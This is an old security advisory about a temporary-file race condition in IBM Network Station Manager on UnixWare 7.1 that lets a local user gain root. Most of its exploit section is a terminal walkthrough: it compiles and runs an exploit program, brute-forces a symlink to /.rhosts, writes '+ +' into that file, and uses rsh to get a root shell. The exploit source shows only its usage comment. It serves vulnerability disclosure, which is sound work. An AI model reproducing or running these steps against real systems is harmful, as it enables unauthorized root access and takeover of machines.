IBM NetStation/UnixWare local root exploit (HTTP interface)
28 Dec. 1999
Summary
The IBM Network Station Manager is a browser-based tool for centrally administering IBM Network Stations and their users. Using the IBM Network Station Manager, the administrator can set IBM Network Station settings on a server wide basis or an individual user or workstation basis.
A vulnerability in IBM's Network Station Manager allows any local user to gain root privileges. This is done using a simple race condition on the temporary files used by IBM NetStation.
Credit:
The information was provided by: Brock Tellier.
A security hole exists in the way NetStation creates temporary files. Instead of using the secure-ish mktemp, NetStation merely appends the current time in seconds to a known file name. Normally, tmp races aren't a big deal for http daemons since they run as nobody or similar, but NetStation must run as root to be able to open/modify files as a specific user. Thus, we can brute force a symlink from xnec.nsu.<time> to /.rhosts and gain root.
Exploit:
bash-2.02$ ls /usr/netstation/nsm/users/xnec
UX:ls: ERROR: Cannot access /usr/netstation/nsm/users/xnec: No such file
or directory
now we go to http://localhost:880, login and click on 'Hardware -> Workstation'
bash-2.02$ ls /usr/netstation/nsm/users/xnec
xnec.nsu xnec.usr
bash-2.02$ cc -o nsmx nsmx.c
bash-2.02$ ./nsmx
<click on Workstation again>
bash-2.02$ ls -la /.rhosts
-rwx------ 1 xnec other 0 Dec 28 06:19 /.rhosts
bash-2.02$ echo "+ +" > /.rhosts
bash-2.02$ chown root /.rhosts
bash-2.02$ rsh -l root localhost sh -I
# id
uid=0(root) gid=3(sys)
groups=0(root),1(other),2(bin),3(sys),4(adm),5(uucp),6(mail),7(tty),8(audit),10(nuucp),12(daemon),23(cron),25(dtadmin),47(priv),9(lp)
#
/* nsmx.c - IBM NetStation on UnixWare 7.1 local root exploit
*
* Exploits a temporary file race condition in NetStation's HTTP interface
*
* To exploit: first, change the paths below to reflect your individual
* settings/paths. Don't worry if <username>.nsu doesn't exist, NS will
* create it for you. Next, point your browser at
* http://localhost:880 and login as a normal user. Click on "Hardware"
* Then "workstation". This will create <netstationdir>/users/xnec.
* Next, compile and run this program. You only have thirty seconds from
* the time you complete this step to then click on "Workstation". When
* this is done, you should have an /.rhosts which you own. On some
* UnixWare systems, you may need to chown root /.rhosts in order to do
* rsh -l root localhost sh -i.
*
* Brock Tellier btellier@usa.net
*
*/
